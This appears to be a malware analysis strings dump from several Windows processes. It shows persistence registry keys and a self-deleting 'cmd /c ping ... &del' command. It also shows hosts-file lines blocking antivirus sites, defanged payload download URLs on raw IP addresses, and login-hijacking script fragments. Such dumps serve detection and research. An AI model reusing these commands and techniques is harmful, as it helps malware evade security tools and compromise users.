Iexplore.exe
wscript.shell
cmd /c ping 127.0.0.1 -n 2&del
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
%Program Files%\Windows Media Player\comine.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
%Program Files%\Internet Explorer\iexplore.exe
WindowStyle
Hotkey
serv.dat
spolsv.exe_1536:
.text
`.rdata
@.data
__MSVCRT_HEAP_SELECT
user32.dll
WinExec
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
InternetOpenUrlA
FindCloseUrlCache
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
WININET.dll
URLDownloadToFileA
urlmon.dll
GetCPInfo
Software\Microsoft\Windows\CurrentVersion\Run
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.kaspersky.com.cn
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.rising.com.cn
127.0.0.1 cn.trendmicro.com
127.0.0.1 VVV.symantec.com
127.0.0.1 sd.360.cn
127.0.0.1 VVV.eset.com.cn
127.0.0.1 VVV.avast.com
127.0.0.1 VVV.micropoint.com.cn
127.0.0.1 VVV.avira.com
127.0.0.1 VVV.avg.com
127.0.0.1 VVV.jiangmin.com
127.0.0.1 VVV.ggsafe.com
127.0.0.1 guanjia.qq.com
hXXp://192.240.107.42:8914/test/shua.txt
hXXp://192.240.107.42:8914/test/down.txt
%Program Files%\Internet Explorer\iexplore.exe
del "%s"
if exist "%s" goto nimei
del_.bat
hXXp://
spolsv.exe
\spolsv.exe
conime.exe
%WinDir%\spolsv.exe
lll.exe_1840:
.text
`.rdata
@.data
KERNEL32.dll
EnumWindows
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
WS2_32.dll
MSVCP60.dll
MSVCRT.dll
DeleteUrlCacheEntry
WININET.dll
URLDownloadToFileA
urlmon.dll
hXXp://124.232.158.94:1932/index.htm
201508100029
124.232.158.94
dk.23145.com
Applications\iexplore.exe\SHELL\OPEN\COMMAND
%s?%c%c%c%c%c
%s%c%c%c%c%c.htm
122.224.34.79
iexplore.exe_900:
%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.fg>
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
te.exe_1244:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
0123456789
0123456789
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
127.0.0.1
127.0.0.1
hXXp://
hXXp://
ole32.dll
ole32.dll
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
Windows NT
Windows NT
self.location
self.location
window.location=document.URL "
window.location=document.URL "
.URL "
.URL "
window.location=
window.location=
var customer = getCookie("safe");if (customer != "ver3.1.2"){alert("
var customer = getCookie("safe");if (customer != "ver3.1.2"){alert("
MSScriptControl.ScriptControl.1
MSScriptControl.ScriptControl.1
document.write(eval("
document.write(eval("
document.write(
document.write(
URL "
URL "
window.location
window.location
document.URL
document.URL
window.history.forward(1);
window.history.forward(1);
?jdfwkey
?jdfwkey
jdfwkey
jdfwkey
document.getElementsByTagName
document.getElementsByTagName
= document.getElementById("num").value
= document.getElementById("num").value
ssfwkey
ssfwkey
window.history.forward(1)
window.history.forward(1)
window.confirm("
window.confirm("
ment.URL
ment.URL
InternetExplorer.Application
InternetExplorer.Application
HTTP/1.1
HTTP/1.1
location="/codeimg.htm"
location="/codeimg.htm"
/codeimg.htm
/codeimg.htm
TLoginSock$
TLoginSock$
2, ip/port
2, ip/port
,web complete
,web complete
httpref:
httpref:
2000000000
2000000000
/safe123.jsp
/safe123.jsp
/safe123.jsp?username=
/safe123.jsp?username=
&key=
&key=
con.document.write('
'
con.document.write(''
con.document.write('
con.document.write('
/login.jsp?username
/login.jsp?username
/login.jsp
/login.jsp
ipspro.jsp?
ipspro.jsp?
flash.swf
flash.swf
/ecatflash.swf
/ecatflash.swf
aqdkey:
aqdkey:
/codeflash.htm
/codeflash.htm
69.165.66.213
69.165.66.213
fdipport:
fdipport:
23.251.41.170
23.251.41.170
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegQueryInfoKeyA
RegQueryInfoKeyA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
wsock32.dll
wsock32.dll
wininet.dll
wininet.dll
InternetOpenUrlA
InternetOpenUrlA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
1 1$1(1,1014181
1 1$1(1,1014181
3 3$3(3,3034383
3 3$3(3,3034383
2!2%2)2-21252~2
2!2%2)2-21252~2
00X0r0z0
00X0r0z0
KWindows
KWindows
HuntHTTPDownload
HuntHTTPDownload
vUCmdList
vUCmdList
/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Failed to get data for '%s'
Failed to get data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
%s.Seek not implemented$Operation not allowed on sorted list
OLE error %.8x.Method '%s' not supported by automation object
OLE error %.8x.Method '%s' not supported by automation object
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation